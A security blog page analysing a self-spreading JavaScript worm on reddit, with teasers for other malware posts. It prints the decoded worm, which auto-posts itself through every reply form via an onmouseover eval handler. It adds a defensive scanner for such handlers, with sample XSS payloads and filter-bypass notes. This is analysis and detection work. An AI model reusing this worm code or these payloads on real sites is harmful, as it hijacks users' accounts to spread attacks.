Malware [insanesecurity]

Reddit worm, oh boy…

As I write this, a JavaScript worm is busy spreading on reddit. On the one hand we should be glad it only spreads and does nothing else (you know, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I have suddenly started getting error pages…

An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e

The (decoded) code of the worm is the following:

// generate payload/attack vector
// having trouble understanding why this works
// (this.innerHTML here is the text of the link being hovered, i.e. the encoded worm
//  itself, so every copy posted carries its own source as the link text)

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in page ($ is the page's own jQuery; .click() opens the reply form)
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill every comment textarea (the reply forms just opened) with the payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
    e[i].value=z;

// submit: click every visible "save" button
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='save'&&e[i].style.display!='none')
        $(e[i]).click();

While writing this article I tried to find the faulty filtering in the reddit source code, but since this was my first time looking at that code base I had no sense of direction. If someone would be kind enough to point me to the file the code resides in, I'd be more than happy.

If not, we’ll have an unsolved mystery :)

UPDATE: the worm author has happily shared his way of evading the filter.

UPDATE 2: a post about the bug on the reddit blog.
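Whatever the filter bug turns out to be, the worm has to end up in the rendered comment HTML as an inline event handler (the onmouseover=eval(unescape(this.innerHTML…)) above) or as a javascript: URL, and that is something you can check for on the output side. The following is an added example, not code from the original post or from reddit: a small tripwire that scans rendered comment HTML for those two constructs. The sample comments are constructed for this example, and the second one is my own guess at how the worm's link would render once it slipped past the filter, not a capture of real reddit markup.

```javascript
// Added example, not code from the original post or from reddit.
// Scans rendered comment HTML for the two ways a payload like the worm above
// executes: an inline event-handler attribute or a javascript: URL.

// Constructed sample comments (comment 1 is an assumed rendering of the worm's
// link, not real reddit markup; the percent-encoded text stands in for the
// encoded worm body that the link text carries).
const SAMPLE_COMMENTS = [
  '<div class="md"><p>see <a href="/r/programming">this thread</a></p></div>',
  '<div class="md"><p><a href="/" onmouseover="eval(unescape(this.innerHTML))">' +
    '%7A%3D%22%5Bx%5D%5Bb%5D%5Cn%5Bb%5D%3A%2F</a></p></div>',
  '<div class="md"><p><a href="javascript:alert(document.cookie)">click</a></p></div>',
  '<div class="md"><p><span ONMouseOver="x()">hover me</span></p></div>',
];

// Start tags and their attribute strings. This is a detector, not an HTML
// parser: good enough to flag comments for review or removal, not a substitute
// for a real sanitizer at render time.
const TAG_RE = /<([a-zA-Z][\w:-]*)\b([^>]*)>/g;
// attribute name, optionally followed by = and a quoted or bare value
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function unquote(v) {
  if (v === undefined) return '';
  return /^["']/.test(v) ? v.slice(1, -1) : v;
}

// Browsers ignore ASCII whitespace and control characters inside the scheme,
// so "java\tscript:" still runs; strip them before comparing.
function isJavascriptUrl(value) {
  return /^javascript:/i.test(value.replace(/[\u0000-\u0020]/g, ''));
}

// Returns one finding per suspicious attribute in the given HTML fragment.
function findInjectedHandlers(html) {
  const findings = [];
  for (const [, tagName, attrText] of html.matchAll(TAG_RE)) {
    for (const [, rawName, rawValue] of attrText.matchAll(ATTR_RE)) {
      const name = rawName.toLowerCase();   // attribute names are case-insensitive
      const value = unquote(rawValue);
      if (name.startsWith('on')) {
        findings.push({ tag: tagName.toLowerCase(), attr: name, value, reason: 'inline event handler' });
      } else if ((name === 'href' || name === 'src') && isJavascriptUrl(value)) {
        findings.push({ tag: tagName.toLowerCase(), attr: name, value, reason: 'javascript: URL' });
      }
    }
  }
  return findings;
}

// Indices of the comments that should be held back or pulled from the site.
function triage(comments) {
  return comments
    .map((c, i) => (findInjectedHandlers(c).length > 0 ? i : -1))
    .filter((i) => i >= 0);
}

for (const i of triage(SAMPLE_COMMENTS)) {
  console.log(`comment ${i}:`, findInjectedHandlers(SAMPLE_COMMENTS[i]));
}
```

Run it with node and it reports comments 1, 2 and 3, each with the offending tag and attribute. Two caveats: it does not decode HTML entities, so an href written as &#106;avascript: would slip past it, and a regex scanner can be confused by malformed markup that a browser still repairs into a working tag. Use it as a tripwire over the comment table, and fix the filter on the input side.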


Malware: a common threat

Malware represents a common threat to everyone surfing the web. It has no ethics and no message to spread, as viruses used to have (not all of them had dangerous payloads).

(continue)


Exploit Shield

An exploit (from the same word in the French language, meaning "achievement", or "accomplishment") is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). This frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack. (Wikipedia)

(continue)


Adobe Reader may doom you

Lately, malware authors have focused more and more on exploiting Adobe Reader (and ultimately users' computers) via maliciously crafted documents, and there have been quite a few Adobe Reader vulnerabilities recently.

The malicious injection on my last hosting service was also an Adobe Reader oriented attack…
(continue)


Our little chinese friend…

As you may have seen, in the last couple of days this blog was inactive, or in the middle of moving… All this happened due to a possible attack on my last hosting provider. I say possible because I can imagine multiple scenarios in which it could have happened.

(continue)


The future of AV, or not?

Recently I read an article in (IN)SECURE Magazine 19 entitled The Future Of AV: looking for the good while stopping the bad. In my opinion there is more to be said about it, taking the article as a starting point.
(continue)
